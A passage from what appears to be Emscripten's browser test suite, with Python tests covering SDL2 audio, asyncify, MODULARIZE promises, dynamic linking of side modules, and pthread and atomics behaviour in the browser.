self.compile_btest(['test.o', '-s', 'EXIT_RUNTIME', '-s', 'USE_SDL=2', '-o', 'test.html'])
self.run_browser('test.html', '...', '/report_result?exit:0')
@parameterized({
'dash_s': (['-s', 'USE_SDL=2', '-s', 'USE_SDL_MIXER=2'],),
'dash_l': (['-lSDL2', '-lSDL2_mixer'],),
})
@requires_sound_hardware
def test_sdl2_mixer_wav(self, flags):
shutil.copyfile(path_from_root('tests', 'sounds', 'the_entertainer.wav'), 'sound.wav')
self.btest('sdl2_mixer_wav.c', expected='1', args=['--preload-file', 'sound.wav', '-s', 'INITIAL_MEMORY=33554432'] + flags)
@parameterized({
'wav': ([], '0', 'the_entertainer.wav'),
'ogg': (['ogg'], 'MIX_INIT_OGG', 'alarmvictory_1.ogg'),
'mp3': (['mp3'], 'MIX_INIT_MP3', 'pudinha.mp3'),
})
@requires_sound_hardware
def test_sdl2_mixer_music(self, formats, flags, music_name):
shutil.copyfile(path_from_root('tests', 'sounds', music_name), music_name)
self.btest('sdl2_mixer_music.c', expected='1', args=[
'--preload-file', music_name,
'-DSOUND_PATH=' + json.dumps(music_name),
'-DFLAGS=' + flags,
'-s', 'USE_SDL=2',
'-s', 'USE_SDL_MIXER=2',
'-s', 'SDL2_MIXER_FORMATS=' + json.dumps(formats),
'-s', 'INITIAL_MEMORY=33554432'
])
@no_wasm_backend('cocos2d needs to be ported')
@requires_graphics_hardware
def test_cocos2d_hello(self):
cocos2d_root = os.path.join(system_libs.Ports.get_build_dir(), 'cocos2d')
preload_file = os.path.join(cocos2d_root, 'samples', 'HelloCpp', 'Resources') + '@'
self.btest('cocos2d_hello.cpp', reference='cocos2d_hello.png', reference_slack=1,
args=['-s', 'USE_COCOS2D=3', '-s', 'ERROR_ON_UNDEFINED_SYMBOLS=0',
'--preload-file', preload_file, '--use-preload-plugins',
'-Wno-inconsistent-missing-override'],
message='You should see Cocos2d logo')
def test_async(self):
for opts in [0, 1, 2, 3]:
print(opts)
self.btest('browser/async.cpp', '1', args=['-O' + str(opts), '-g2', '-s', 'ASYNCIFY'])
@requires_threads
def test_async_in_pthread(self):
self.btest('browser/async.cpp', '1', args=['-s', 'ASYNCIFY', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-g'])
def test_async_2(self):
# Error.stackTraceLimit defaults to 10 in Chrome, but this test relies on more
# than 40 stack frames being reported.
create_test_file('pre.js', 'Error.stackTraceLimit = 80;\n')
self.btest('browser/async_2.cpp', '40', args=['-O3', '--pre-js', 'pre.js', '-s', 'ASYNCIFY'])
def test_async_virtual(self):
for opts in [0, 3]:
print(opts)
self.btest('browser/async_virtual.cpp', '5', args=['-O' + str(opts), '-profiling', '-s', 'ASYNCIFY'])
def test_async_virtual_2(self):
for opts in [0, 3]:
print(opts)
self.btest('browser/async_virtual_2.cpp', '1', args=['-O' + str(opts), '-s', 'ASSERTIONS', '-s', 'SAFE_HEAP', '-profiling', '-s', 'ASYNCIFY'])
# Test async sleeps in the presence of invoke_* calls, which can happen with
# longjmp or exceptions.
@parameterized({
'O0': ([],), # noqa
'O3': (['-O3'],), # noqa
})
def test_async_longjmp(self, args):
self.btest('browser/async_longjmp.cpp', '2', args=args + ['-s', 'ASYNCIFY'])
def test_async_mainloop(self):
for opts in [0, 3]:
print(opts)
self.btest('browser/async_mainloop.cpp', '121', args=['-O' + str(opts), '-s', 'ASYNCIFY'])
@requires_sound_hardware
def test_sdl_audio_beep_sleep(self):
self.btest('sdl_audio_beep_sleep.cpp', '1', args=['-Os', '-s', 'ASSERTIONS', '-s', 'DISABLE_EXCEPTION_CATCHING=0', '-profiling', '-s', 'SAFE_HEAP', '-lSDL', '-s', 'ASYNCIFY'], timeout=90)
def test_mainloop_reschedule(self):
self.btest('mainloop_reschedule.cpp', '1', args=['-Os', '-s', 'ASYNCIFY'])
def test_mainloop_infloop(self):
self.btest('mainloop_infloop.cpp', '1', args=['-s', 'ASYNCIFY'])
def test_async_iostream(self):
self.btest('browser/async_iostream.cpp', '1', args=['-s', 'ASYNCIFY'])
# Test an async return value. The value goes through a custom JS library
# method that uses asyncify, and therefore it needs to be declared in
# ASYNCIFY_IMPORTS.
# To make the test more precise we also use ASYNCIFY_IGNORE_INDIRECT here.
@parameterized({
'normal': (['-s', 'ASYNCIFY_IMPORTS=["sync_tunnel"]'],), # noqa
'response': (['-s', 'ASYNCIFY_IMPORTS=@filey.txt'],), # noqa
'nothing': (['-DBAD'],), # noqa
'empty_list': (['-DBAD', '-s', 'ASYNCIFY_IMPORTS=[]'],), # noqa
'em_js_bad': (['-DBAD', '-DUSE_EM_JS'],), # noqa
})
def test_async_returnvalue(self, args):
if '@' in str(args):
create_test_file('filey.txt', '["sync_tunnel"]')
self.btest('browser/async_returnvalue.cpp', '0', args=['-s', 'ASYNCIFY', '-s', 'ASYNCIFY_IGNORE_INDIRECT', '--js-library', path_from_root('tests', 'browser', 'async_returnvalue.js')] + args + ['-s', 'ASSERTIONS'])
def test_async_stack_overflow(self):
self.btest('browser/async_stack_overflow.cpp', '0', args=['-s', 'ASYNCIFY', '-s', 'ASYNCIFY_STACK_SIZE=4'])
def test_async_bad_list(self):
self.btest('browser/async_bad_list.cpp', '0', args=['-s', 'ASYNCIFY', '-s', 'ASYNCIFY_ONLY=["waka"]', '--profiling'])
# Tests that when building with -s MINIMAL_RUNTIME=1, the build can use -s MODULARIZE=1 as well.
def test_minimal_runtime_modularize(self):
self.compile_btest([path_from_root('tests', 'browser_test_hello_world.c'), '-o', 'test.html', '-s', 'MODULARIZE', '-s', 'MINIMAL_RUNTIME'])
self.run_browser('test.html', None, '/report_result?0')
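# With MODULARIZE the output is a factory function (named Module by default, or
# EXPORT_NAME) that returns a promise resolving to the instance; noInitialRun lets the
# caller invoke _main() manually.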
@requires_sync_compilation
def test_modularize(self):
for opts in [
[],
['-O1'],
['-O2', '-profiling'],
['-O2'],
['-O2', '--closure', '1']
]:
for args, code in [
# defaults
([], '''
let promise = Module();
if (!(promise instanceof Promise)) throw new Error('Return value should be a promise');
'''),
# use EXPORT_NAME
(['-s', 'EXPORT_NAME="HelloWorld"'], '''
if (typeof Module !== "undefined") throw "what?!"; // do not pollute the global scope, we are modularized!
HelloWorld.noInitialRun = true; // erroneous module capture would load this and cause a timeout
let promise = HelloWorld();
if (!(promise instanceof Promise)) throw new Error('Return value should be a promise');
'''),
# pass in a Module option (which prevents main(), which we then invoke ourselves)
(['-s', 'EXPORT_NAME="HelloWorld"'], '''
HelloWorld({ noInitialRun: true }).then(hello => {
hello._main();
});
'''),
# Even without a mem init file, everything is async
(['-s', 'EXPORT_NAME="HelloWorld"', '--memory-init-file', '0'], '''
HelloWorld({ noInitialRun: true }).then(hello => {
hello._main();
});
'''),
]:
print('test on', opts, args, code)
# this test is synchronous, so avoid async startup due to wasm features
self.compile_btest([path_from_root('tests', 'browser_test_hello_world.c'), '-s', 'MODULARIZE', '-s', 'SINGLE_FILE'] + args + opts)
create_test_file('a.html', '''
<script src="a.out.js"></script>
<script>
%s
</script>
''' % code)
self.run_browser('a.html', '...', '/report_result?0')
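# Deleting a.out.wasm should make the MODULARIZE factory's promise reject with the
# 'both async and sync fetching of the wasm failed' abort, rather than hang.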
def test_modularize_network_error(self):
test_c_path = path_from_root('tests', 'browser_test_hello_world.c')
browser_reporting_js_path = path_from_root('tests', 'browser_reporting.js')
self.compile_btest([test_c_path, '-s', 'MODULARIZE', '-s', 'EXPORT_NAME="createModule"', '--extern-pre-js', browser_reporting_js_path])
create_test_file('a.html', '''
<script src="a.out.js"></script>
<script>
createModule()
.then(() => {
reportResultToServer("Module creation succeeded when it should have failed");
})
.catch(err => {
reportResultToServer(err.message.slice(0, 54));
});
</script>
''')
print('Deleting a.out.wasm to cause a download error')
os.remove('a.out.wasm')
self.run_browser('a.html', '...', '/report_result?abort(both async and sync fetching of the wasm failed)')
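# An error thrown during module initialization should reject the factory's promise and
# be delivered to .catch(), not surface as an unhandled rejection.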
def test_modularize_init_error(self):
test_cpp_path = path_from_root('tests', 'browser', 'test_modularize_init_error.cpp')
browser_reporting_js_path = path_from_root('tests', 'browser_reporting.js')
self.compile_btest([test_cpp_path, '-s', 'MODULARIZE', '-s', 'EXPORT_NAME="createModule"', '--extern-pre-js', browser_reporting_js_path])
create_test_file('a.html', '''
<script src="a.out.js"></script>
<script>
if (typeof window === 'object') {
window.addEventListener('unhandledrejection', function(event) {
reportResultToServer("Unhandled promise rejection: " + event.reason.message);
});
}
createModule()
.then(() => {
reportResultToServer("Module creation succeeded when it should have failed");
})
.catch(err => {
reportResultToServer(err);
});
</script>
''')
self.run_browser('a.html', '...', '/report_result?intentional error to test rejection')
# test illustrating the regression in the modularize feature introduced in commit c5af8f6
# when compiling with the --preload-file option
def test_modularize_and_preload_files(self):
# amount of memory, different from the default, that will be allocated for the Emscripten heap
totalMemory = 33554432
for opts in [[], ['-O1'], ['-O2', '-profiling'], ['-O2'], ['-O2', '--closure', '1']]:
# the main function simply checks that the amount of allocated heap memory is correct
create_test_file('test.c', r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
EM_ASM({
// use bracket access so the property name survives when closure compiler is enabled
var totalMemory = Module['INITIAL_MEMORY'];
assert(totalMemory === %d, 'bad memory size');
});
REPORT_RESULT(0);
return 0;
}
''' % totalMemory)
# generate a dummy file
create_test_file('dummy_file', 'dummy')
# compile the code with the modularize feature and the preload-file option enabled
# no wasm, since this tests customizing total memory at runtime
self.compile_btest(['test.c', '-s', 'WASM=0', '-s', 'MODULARIZE', '-s', 'EXPORT_NAME="Foo"', '--preload-file', 'dummy_file'] + opts)
create_test_file('a.html', '''
<script src="a.out.js"></script>
<script>
// instantiate the Foo module with custom INITIAL_MEMORY value
var foo = Foo({ INITIAL_MEMORY: %d });
</script>
''' % totalMemory)
self.run_browser('a.html', '...', '/report_result?0')
def test_webidl(self):
# see original in test_core.py
self.run_process([PYTHON, path_from_root('tools', 'webidl_binder.py'),
path_from_root('tests', 'webidl', 'test.idl'),
'glue'])
self.assertExists('glue.cpp')
self.assertExists('glue.js')
for opts in [[], ['-O1'], ['-O2']]:
print(opts)
self.btest(os.path.join('webidl', 'test.cpp'), '1', args=['--post-js', 'glue.js', '-I.', '-DBROWSER'] + opts)
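# Dynamic linking in the browser: list side.wasm in Module.dynamicLibraries and verify
# that a string allocated by the side module is readable from main, both on the main
# thread and under --proxy-to-worker.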
@requires_sync_compilation
def test_dynamic_link(self):
create_test_file('pre.js', '''
Module.dynamicLibraries = ['side.wasm'];
''')
create_test_file('main.cpp', r'''
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <emscripten.h>
char *side(const char *data);
int main() {
char *temp = side("hello through side\n");
char *ret = (char*)malloc(strlen(temp)+1);
strcpy(ret, temp);
temp[1] = 'x';
EM_ASM({
Module.realPrint = out;
out = function(x) {
if (!Module.printed) Module.printed = x;
Module.realPrint(x);
};
});
puts(ret);
EM_ASM({ assert(Module.printed === 'hello through side', ['expected', Module.printed]); });
REPORT_RESULT(2);
return 0;
}
''')
create_test_file('side.cpp', r'''
#include <stdlib.h>
#include <string.h>
char *side(const char *data);
char *side(const char *data) {
char *ret = (char*)malloc(strlen(data)+1);
strcpy(ret, data);
return ret;
}
''')
self.run_process([EMCC, 'side.cpp', '-s', 'SIDE_MODULE', '-O2', '-o', 'side.wasm', '-s', 'EXPORT_ALL'])
self.btest(self.in_dir('main.cpp'), '2', args=['-s', 'MAIN_MODULE', '-O2', '--pre-js', 'pre.js', '-s', 'EXPORT_ALL'])
print('wasm in worker (we can read binary data synchronously there)')
create_test_file('pre.js', '''
var Module = { dynamicLibraries: ['side.wasm'] };
''')
self.run_process([EMCC, 'side.cpp', '-s', 'SIDE_MODULE', '-O2', '-o', 'side.wasm', '-s', 'EXPORT_ALL'])
self.btest(self.in_dir('main.cpp'), '2', args=['-s', 'MAIN_MODULE', '-O2', '--pre-js', 'pre.js', '--proxy-to-worker', '-s', 'EXPORT_ALL'])
print('wasm (will auto-preload since no sync binary reading)')
create_test_file('pre.js', '''
Module.dynamicLibraries = ['side.wasm'];
''')
# same wasm side module works
self.btest(self.in_dir('main.cpp'), '2', args=['-s', 'MAIN_MODULE', '-O2', '--pre-js', 'pre.js', '-s', 'EXPORT_ALL'])
# verify that dynamic linking works in all kinds of in-browser environments.
# don't mix different kinds in a single test.
@parameterized({
'': ([0],),
'inworker': ([1],),
})
def test_dylink_dso_needed(self, inworker):
self.emcc_args += ['-O2']
# --proxy-to-worker only on main
if inworker:
self.emcc_args += ['--proxy-to-worker']
def do_run(src, expected_output):
# XXX there is no infrastructure (yet?) to retrieve stdout from the browser in tests,
# so do the assert about the expected output inside the browser.
#
# we have to put the hook into post.js because in main it is too late
# (in main we won't be able to catch what static constructors inside
# linked dynlibs printed), and in pre.js it is too early (out is not yet
# set up by the shell).
create_test_file('post.js', r'''
Module.realPrint = out;
out = function(x) {
if (!Module.printed) Module.printed = "";
Module.printed += x + '\n'; // out is passed str without last \n
Module.realPrint(x);
};
''')
create_test_file('test_dylink_dso_needed.c', src + r'''
#include <emscripten/em_asm.h>
int main() {
int rtn = test_main();
EM_ASM({
var expected = %r;
assert(Module.printed === expected, ['stdout expected:', expected]);
});
return rtn;
}
''' % expected_output)
self.btest_exit(self.in_dir('test_dylink_dso_needed.c'), 0, args=self.get_emcc_args() + ['--post-js', 'post.js'])
self._test_dylink_dso_needed(do_run)
@requires_graphics_hardware
@requires_sync_compilation
def test_dynamic_link_glemu(self):
create_test_file('pre.js', '''
Module.dynamicLibraries = ['side.wasm'];
''')
create_test_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <assert.h>
const char *side();
int main() {
const char *exts = side();
puts(side());
assert(strstr(exts, "GL_EXT_texture_env_combine"));
REPORT_RESULT(1);
return 0;
}
''')
create_test_file('side.cpp', r'''
#include "SDL/SDL.h"
#include "SDL/SDL_opengl.h"
const char *side() {
SDL_Init(SDL_INIT_VIDEO);
SDL_SetVideoMode(600, 600, 16, SDL_OPENGL);
return (const char *)glGetString(GL_EXTENSIONS);
}
''')
self.run_process([EMCC, 'side.cpp', '-s', 'SIDE_MODULE', '-O2', '-o', 'side.wasm', '-lSDL', '-s', 'EXPORT_ALL'])
self.btest(self.in_dir('main.cpp'), '1', args=['-s', 'MAIN_MODULE', '-O2', '-s', 'LEGACY_GL_EMULATION', '-lSDL', '-lGL', '--pre-js', 'pre.js', '-s', 'EXPORT_ALL'])
def test_dynamic_link_many(self):
# test asynchronously loading two side modules during startup
create_test_file('pre.js', '''
Module.dynamicLibraries = ['side1.wasm', 'side2.wasm'];
''')
create_test_file('main.c', r'''
int side1();
int side2();
int main() {
return side1() + side2();
}
''')
create_test_file('side1.c', r'''
int side1() { return 1; }
''')
create_test_file('side2.c', r'''
int side2() { return 2; }
''')
self.run_process([EMCC, 'side1.c', '-s', 'SIDE_MODULE', '-o', 'side1.wasm'])
self.run_process([EMCC, 'side2.c', '-s', 'SIDE_MODULE', '-o', 'side2.wasm'])
self.btest_exit(self.in_dir('main.c'), '3',
args=['-s', 'MAIN_MODULE', '--pre-js', 'pre.js'])
def test_dynamic_link_pthread_many(self):
# Test asynchronously loading two side modules during startup
# They should always load in the same order
# Verify that function pointers in the browser's main thread
# refer to the same function as in a pthread worker.
# The main thread function table is populated asynchronously
# in the browser's main thread. However, it should still be
# populated in the same order as in a pthread worker to
# guarantee function pointer interop.
create_test_file('main.cpp', r'''
#include <thread>
int side1();
int side2();
int main() {
auto side1_ptr = &side1;
auto side2_ptr = &side2;
// Don't join the thread since this is running in the
// browser's main thread.
std::thread([=]{
REPORT_RESULT(int(
side1_ptr == &side1 &&
side2_ptr == &side2
));
}).detach();
return 0;
}
''')
# The browser will try to load side1 first.
# Use a big payload in side1 so that it takes longer to load than side2
create_test_file('side1.cpp', r'''
char const * payload1 = "''' + str(list(range(1, int(1e5)))) + r'''";
int side1() { return 1; }
''')
create_test_file('side2.cpp', r'''
char const * payload2 = "0";
int side2() { return 2; }
''')
self.run_process([EMCC, 'side1.cpp', '-Wno-experimental', '-pthread', '-s', 'SIDE_MODULE', '-o', 'side1.wasm'])
self.run_process([EMCC, 'side2.cpp', '-Wno-experimental', '-pthread', '-s', 'SIDE_MODULE', '-o', 'side2.wasm'])
self.btest(self.in_dir('main.cpp'), '1',
args=['-Wno-experimental', '-pthread', '-s', 'MAIN_MODULE',
'-s', 'RUNTIME_LINKED_LIBS=["side1.wasm","side2.wasm"]'])
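# Preloading ~30MB of data with only a 16MB initial heap (and a tiny stack) forces
# ALLOW_MEMORY_GROWTH to grow the heap while the runtime is still starting up.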
def test_memory_growth_during_startup(self):
create_test_file('data.dat', 'X' * (30 * 1024 * 1024))
self.btest('browser_test_hello_world.c', '0', args=['-s', 'ASSERTIONS', '-s', 'ALLOW_MEMORY_GROWTH', '-s', 'INITIAL_MEMORY=16MB', '-s', 'TOTAL_STACK=16384', '--preload-file', 'data.dat'])
# pthreads tests
def prep_no_SAB(self):
create_test_file('html.html', open(path_from_root('src', 'shell_minimal.html')).read().replace('''<body>''', '''<body>
<script>
SharedArrayBuffer = undefined;
Atomics = undefined;
</script>
'''))
@requires_threads
def test_pthread_c11_threads(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_c11_threads.c'),
expected='0',
args=['-g4', '-std=gnu11', '-xc', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'TOTAL_MEMORY=64mb'])
# Test that the emscripten_ atomics api functions work.
@parameterized({
'normal': ([],),
'closure': (['--closure', '1'],),
})
@requires_threads
def test_pthread_atomics(self, args=[]):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_atomics.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8', '-g1'] + args)
# Test 64-bit atomics.
@requires_threads
def test_pthread_64bit_atomics(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_64bit_atomics.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test 64-bit C++11 atomics.
@requires_threads
def test_pthread_64bit_cxx11_atomics(self):
for opt in [['-O0'], ['-O3']]:
for pthreads in [[], ['-s', 'USE_PTHREADS']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_64bit_cxx11_atomics.cpp'), expected='0', args=opt + pthreads)
# Test c++ std::thread::hardware_concurrency()
@requires_threads
def test_pthread_hardware_concurrency(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_hardware_concurrency.cpp'), expected='0', args=['-O2', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE="navigator.hardwareConcurrency"'])
@parameterized({
'join': ('join',),
'wait': ('wait',),
})
@requires_threads
def test_pthread_main_thread_blocking(self, name):
print('Test that we error if not ALLOW_BLOCKING_ON_MAIN_THREAD')
self.btest(path_from_root('tests', 'pthread', 'main_thread_%s.cpp' % name), expected='0', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-s', 'ALLOW_BLOCKING_ON_MAIN_THREAD=0'])
if name == 'join':
print('Test that by default we just warn about blocking on the main thread.')
self.btest(path_from_root('tests', 'pthread', 'main_thread_%s.cpp' % name), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
print('Test that tryjoin is fine, even if not ALLOW_BLOCKING_ON_MAIN_THREAD')
self.btest(path_from_root('tests', 'pthread', 'main_thread_join.cpp'), expected='2', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-g', '-DTRY_JOIN', '-s', 'ALLOW_BLOCKING_ON_MAIN_THREAD=0'])
print('Test that tryjoin is fine, even if not ALLOW_BLOCKING_ON_MAIN_THREAD, and even without a pool')
self.btest(path_from_root('tests', 'pthread', 'main_thread_join.cpp'), expected='2', args=['-O3', '-s', 'USE_PTHREADS', '-g', '-DTRY_JOIN', '-s', 'ALLOW_BLOCKING_ON_MAIN_THREAD=0'])
print('Test that everything works ok when we are on a pthread.')
self.btest(path_from_root('tests', 'pthread', 'main_thread_%s.cpp' % name), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-s', 'PROXY_TO_PTHREAD', '-s', 'ALLOW_BLOCKING_ON_MAIN_THREAD=0'])
# Test the old GCC atomic __sync_fetch_and_op builtin operations.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_gcc_atomic_fetch_and_op(self):
for opt in [[], ['-O1'], ['-O2'], ['-O3'], ['-Os']]:
for debug in [[], ['-g']]:
args = opt + debug
print(args)
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_atomic_fetch_and_op.cpp'), expected='0', args=args + ['-s', 'INITIAL_MEMORY=64MB', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# 64 bit version of the above test.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_gcc_64bit_atomic_fetch_and_op(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_64bit_atomic_fetch_and_op.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'], also_asmjs=True)
# Test the old GCC atomic __sync_op_and_fetch builtin operations.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_gcc_atomic_op_and_fetch(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_atomic_op_and_fetch.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'], also_asmjs=True)
# 64 bit version of the above test.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_gcc_64bit_atomic_op_and_fetch(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_64bit_atomic_op_and_fetch.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'], also_asmjs=True)
# Tests the remaining GCC atomics after the two tests above.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_gcc_atomics(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_atomics.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test the __sync_lock_test_and_set and __sync_lock_release primitives.
@requires_threads
def test_pthread_gcc_spinlock(self):
for arg in [[], ['-DUSE_EMSCRIPTEN_INTRINSICS']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_spinlock.cpp'), expected='800', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'] + arg, also_asmjs=True)
# Test that basic thread creation works.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_create(self):
def test(args):
print(args)
self.btest(path_from_root('tests', 'pthread', 'test_pthread_create.cpp'),
expected='0',
args=['-s', 'INITIAL_MEMORY=64MB', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'] + args,
extra_tries=0) # this should be 100% deterministic
print() # new line
test([])
test(['-O3'])
# TODO: re-enable minimal runtime once the flakiness is figured out,
# https://github.com/emscripten-core/emscripten/issues/12368
# test(['-s', 'MINIMAL_RUNTIME'])
# Test that preallocating worker threads works.
@requires_threads
def test_pthread_preallocates_workers(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_preallocates_workers.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=4', '-s', 'PTHREAD_POOL_DELAY_LOAD'])
# Test that allocating a lot of threads doesn't regress. This needs to be checked manually!
@requires_threads
def test_pthread_large_pthread_allocation(self):
self.btest(path_from_root('tests', 'pthread', 'test_large_pthread_allocation.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=128MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=50'], message='Check output from test to ensure that a regression in time it takes to allocate the threads has not occurred.')
# Tests the -s PROXY_TO_PTHREAD=1 option.
@requires_threads
def test_pthread_proxy_to_pthread(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_proxy_to_pthread.c'), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
# Test that a pthread can spawn another pthread of its own.
@requires_threads
def test_pthread_create_pthread(self):
for modularize in [[], ['-s', 'MODULARIZE', '-s', 'EXPORT_NAME=MyModule', '--shell-file', path_from_root('tests', 'shell_that_launches_modularize.html')]]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_create_pthread.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2'] + modularize)
# Test another case of pthreads spawning pthreads, but this time the callers immediately join on the threads they created.
@requires_threads
def test_pthread_nested_spawns(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_nested_spawns.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2'])
# Test that main thread can wait for a pthread to finish via pthread_join().
@requires_threads
def test_pthread_join(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_join.cpp'), expected='6765', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test that threads can rejoin the pool once detached and finished
@requires_threads
def test_std_thread_detach(self):
self.btest(path_from_root('tests', 'pthread', 'test_std_thread_detach.cpp'), expected='0', args=['-s', 'USE_PTHREADS'])
# Test pthread_cancel() operation
@requires_threads
def test_pthread_cancel(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_cancel.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test pthread_kill() operation
@no_chrome('pthread_kill hangs the chrome renderer, and keeps subsequent tests from passing')
@requires_threads
def test_pthread_kill(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_kill.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test that pthread cleanup stack (pthread_cleanup_push/_pop) works.
@requires_threads
def test_pthread_cleanup(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_cleanup.cpp'), expected='907640832', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Tests the pthread mutex api.
@requires_threads
def test_pthread_mutex(self):
for arg in [[], ['-DSPINLOCK_TEST']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_mutex.cpp'), expected='50', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'] + arg)
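# Test pthread_attr_getstack() in a pthread-enabled build (tests/pthread/test_pthread_attr_getstack.cpp).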
@requires_threads
def test_pthread_attr_getstack(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_attr_getstack.cpp'), expected='0', args=['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2'])
# Test that memory allocation is thread-safe.
@requires_threads
def test_pthread_malloc(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_malloc.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Stress test pthreads allocating memory that will call sbrk(), with the main thread having to free up the data.
@requires_threads
def test_pthread_malloc_free(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_malloc_free.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8', '-s', 'INITIAL_MEMORY=256MB'])
# Test that the pthread_barrier API works ok.
@requires_threads
def test_pthread_barrier(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_barrier.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test the pthread_once() function.
@requires_threads
def test_pthread_once(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_once.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test against a certain thread exit time handling bug by spawning tons of threads.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_spawns(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_spawns.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8', '--closure', '1', '-s', 'ENVIRONMENT=web,worker'])
# It is common for code to flip volatile global vars for thread control. This is a bit lax, but nevertheless, test whether that
# kind of scheme will work with Emscripten as well.
@requires_threads
def test_pthread_volatile(self):
for arg in [[], ['-DUSE_C_VOLATILE']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_volatile.cpp'), expected='1', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'] + arg)
